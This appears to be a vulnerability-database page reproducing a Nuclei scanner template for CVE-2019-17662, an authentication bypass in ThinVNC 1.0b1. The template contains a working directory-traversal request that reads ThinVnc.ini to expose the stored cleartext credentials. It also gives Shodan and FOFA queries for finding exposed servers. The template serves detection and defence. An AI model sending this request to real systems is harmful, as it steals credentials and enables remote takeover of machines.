Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-17662
HistoryAug 23, 2023 - 6:24 p.m.

ThinVNC 1.0b1 - Authentication Bypass

2023-08-2318:24:17
ProjectDiscovery
github.com
7
cve2019
packetstorm
auth-bypass
thinvnc
intrusive
cybelsoft
directory-traversal
cleartext-password

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.5 High

AI Score

Confidence

High

0.7 Medium

EPSS

Percentile

98.0%

ThinVNC 1.0b1 is vulnerable to arbitrary file read, which leads to a compromise of the VNC server. The vulnerability exists even when authentication is turned on during the deployment of the VNC server. The password for authentication is stored in cleartext in a file that can be read via a ../../ThinVnc.ini directory traversal attack vector.
id: CVE-2019-17662

info:
  name: ThinVNC 1.0b1 - Authentication Bypass
  author: DhiyaneshDK
  severity: critical
  description: |
    ThinVNC 1.0b1 is vulnerable to arbitrary file read, which leads to a compromise of the VNC server. The vulnerability exists even when authentication is turned on during the deployment of the VNC server. The password for authentication is stored in cleartext in a file that can be read via a ../../ThinVnc.ini directory traversal attack vector.
  impact: |
    An attacker can bypass authentication and gain unauthorized access to the ThinVNC application.
  remediation: |
    Upgrade to a patched version of ThinVNC or implement additional authentication mechanisms.
  reference:
    - http://packetstormsecurity.com/files/154896/ThinVNC-1.0b1-Authentication-Bypass.html
    - https://github.com/bewest/thinvnc/issues/5
    - https://redteamzone.com/ThinVNC/
    - https://github.com/shashankmangal2/Exploits/blob/master/ThinVNC-RemoteAccess/POC.py
    - https://github.com/YIXINSHUWU/Penetration_Testing_POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-17662
    cwe-id: CWE-22
    epss-score: 0.64941
    epss-percentile: 0.97813
    cpe: cpe:2.3:a:cybelsoft:thinvnc:1.0:b1:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: cybelsoft
    product: thinvnc
    shodan-query: http.favicon.hash:-1414548363
    fofa-query: icon_hash=-1414548363
  tags: cve,cve2019,packetstorm,auth-bypass,thinvnc,intrusive,cybelsoft

http:
  - raw:
      - |
        GET /{{randstr}}/../../ThinVnc.ini HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "User="
          - "Password="
        condition: and

      - type: word
        part: header
        words:
          - "application/binary"

      - type: status
        status:
          - 200
# digest: 4b0a004830460221009e93bbc96a7bb5945b58dada7d9b3c3b04ae3b8afaca4a545e1d62d129334aaf022100836757c1e5af51c0626ec9e6ba4d71c0a5b01b8465420f223446abaf209de755:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.5 High

AI Score

Confidence

High

0.7 Medium

EPSS

Percentile

98.0%